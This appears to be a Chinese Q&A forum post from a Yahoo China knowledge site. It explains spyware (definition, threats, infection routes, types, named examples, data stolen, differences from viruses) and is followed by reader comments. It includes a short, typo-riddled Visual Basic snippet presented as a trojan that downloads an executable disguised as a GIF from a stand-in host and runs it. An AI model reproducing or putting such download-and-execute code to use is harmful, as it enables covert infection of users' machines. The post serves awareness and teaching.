有问题先搜索一下: 高级搜索

知识贡献 - 浏览8895次

下一个知识贡献
hzlhimly.2007hzlhimly.2007

高级书童

什么是间谍软件?

定义,在未得到用户同意前提下,一个自动下载并执行的程序,该程序秘密悼念用户信息并发送给相关第三方.
威胁一揽:
任何站点可藏匿有间谍软件;
打开垃圾邮件,间谍软件被推送到您机器;
泄漏机密信息;
消耗企业带宽资源;
降低企业机器速度;
企业网络留下后门.

软件很小....却很难清除
Function (dowplozd() As Boolean
Open"c:\\Windows\wmclaver. exe"For Binary Access White As #1
Put #1.Inet Obj.Open URL(HTTP://Spvware.com/SpywareExe.GIf.ic ByteArray)
Close#1
Shell"c:\\Windows\wmdlaver.exe"
End Function
这是一个VB木马,仅有四行代码-以可执行文件方式下载(作为GIF文件),并执行该文件;
每一个间谍软件的下载都可以时实编辑每一个下载都有一个唯一签名;
典型的间谍软件安装包含20-30个木马-互相通知/更新;
传统病毒软件特征码的检查成功率仅50%-间谍软件都独一无二,遥遥领先于特征码开发者.

间谍软件感染方式
"背上"安装方式::在安装免费软件如屏保程序,文件共享程序等自动安装;
"推送下载":通过文章网站,或者通过浏览器阅读电子工业邮件下载;
浏览器漏洞::一个下载工具在下载后,可以下载大量间谍软件;
广告软件:发布广告信息,监控及汇报用户行为.

五种常见类型的间谍软件
-系统监控(System Monitor): 如:键盘日志(Keyboard logger/trackware)捕捉键盘录入(个人信息,密码,文章的网站等)
-木马(Trojan):使你的机器远程被黑客控制,经常是为拒绝服务攻击(DOS);
蒜靶软件(DRONEWARE):面向宿主在量发送垃圾邮件,或者戟性网站资料;
拔号软件(Dialer):自动拔号的程序;
广告软件(Adware):自动弹出广告窗口,推送广告信息.

几种间谍软件潦倒
PurityScan----显示弹出广告,宣称能够卸用户电脑上的色情图片;
Transponder(vx2)----"IE浏览器助手2",监控网页浏览,发送有关广告;
KeenValue----广告软件,搜集私人信息,向用户发送广告;
Perfect Keylogger----监控上具,记录网页浏览历史,键盘招标按键记录,登陆密码帐号等私人信息.

间谍软件窃取的资料
1,企业的种类机密信息:客户信息,员工薪酬资料,企业财务档案,企业软件源码,机密交易资料;
2,政府的种类机密信息:政府红头文件,会议机要,国家重要经济数据等;
3,金融机构的种类机密信息:大量储户保密信息,重要的金融数据,重要的协议往来文件,种类公司户头信息等;
个人信息:个人的密码,身份信息重要资料,网上浏览习惯等.

--通过行为区别:病毒的行为在于传播/间谍软件行为在于寄生-病毒软件目的在于感染电脑,进行自我复制,在最短时间内感染最多电脑;
-间谍软件需伪装成合法软件,寄生在DLL或registry中,可以秘密地发信你的信息;
--通过目的区别:病毒的目的名声/间谍软件在于获利-病毒的作者多是为了恶作剧或者是自我显示及自我实现;
间谍软件的目的是寄生在你的电脑上,用于商业获利的目的;
--通过恶意程度区别:病毒需要破坏/间谍软件需要安全稳定
-病毒是有意要起到破坏作用的,如删除系统资料,破坏文件结构,发动DDOS攻击等;
-间谍软件的目的在于获利,所以需要它的寄生方"身体健康"所以它们通常是不不破坏的.

18 3
  • qq370079140@qq370079140@

    伴读书童

    想学反病毒技术的话可以到www.musio770.cn上去学习,里面有这方面的最新最全的资料

  • 过客

    过客

    116.11.172.*

    网络就相现实世界....乱七八糟的..永远都一样.我什么也不懂.也不想懂.因为学无止境

  • 过客

    过客

    221.4.137.*

    多懂点总是有好处的

  • JJ

    勤学秀才

    通过学校向人们传播正确的黑客精神,有人说黑客是网络的牛仔,而我认为真正的黑客应该是网络的骑士,应该是网络的守护者而不是驻虫。

  • JJ

    勤学秀才

    不是,我对编程也只是半吊子,我只是想说人们的利用方法不对而已,比如你上面所提到我那几行代码,如果利用得当,可以方便人们的操作而不是造成破坏,而现在部分所谓的黑客,他们的作为只是不停的破坏、攻击、偷盗,我甚至在一家专业的黑客杂志上看到像“黑客使用网络交纳费用是丢脸”这样的言论,而我又看了那位仁兄所谓的“免费方法”,就是通过盗取别人的银行或其他什么的帐号,让别人“帮他代交”。真可笑,明明是小偷的行为,却说得如些天经地义,认为这是技术的表现,值得拿来炫耀。由此可见昔日的黑客精神已经没落,国人的网络思想已经到了岌岌可危的地步。而想灭绝它又是不可能的事情,所以我前面才会说应由政府扶持专业的黑客学校.~~

  • HIMLYHIMLY

    解元

    楼上那么厉害,可以补充呀!
    小女子学疏识浅,还望不吝赐教。

  • JJ

    勤学秀才

    万事都是双刃剑,事实上我觉得不应称这些代码为病毒,对常人来说,可以称为负作用代码,他们有害不过是他们被不安好心的人利用了而已,所以强化黑客们的思想教育,加强网络管理,完善网络法律制度和执行能力才是实事。

  • cailiwei1987cailiwei1987

    伴读书童

    为什么只是介绍,不说怎么查找和解决呀!
    只是增长见识是不够的呀~!

  • 泠泉泠泉

    伴读书童

    學習了!不錯不錯

  • szjiaodaiszjiaodai

    伴读书童

    学习,学习...

  • TonyTony

    穷酸秀才

    谢谢

  • mengxiangzhou2005mengxiangzh...

    伴读书童

    开眼

  • 精彩的贡献,,,题材选的很好!!!

请您登陆后发表意见。

返回知识堂首页>>

1
Copyright © 2009 Yahoo.com.cn 版权所有 不得转载 | 使用须知 | 著作权声明 | 京ICP证000022号 | 国家药监局(京)-经营性-2004-0039
阿里巴巴集团 - 阿里巴巴 | 淘宝站 | 支付宝 | 口碑网
文明办网举报热线 010-65986060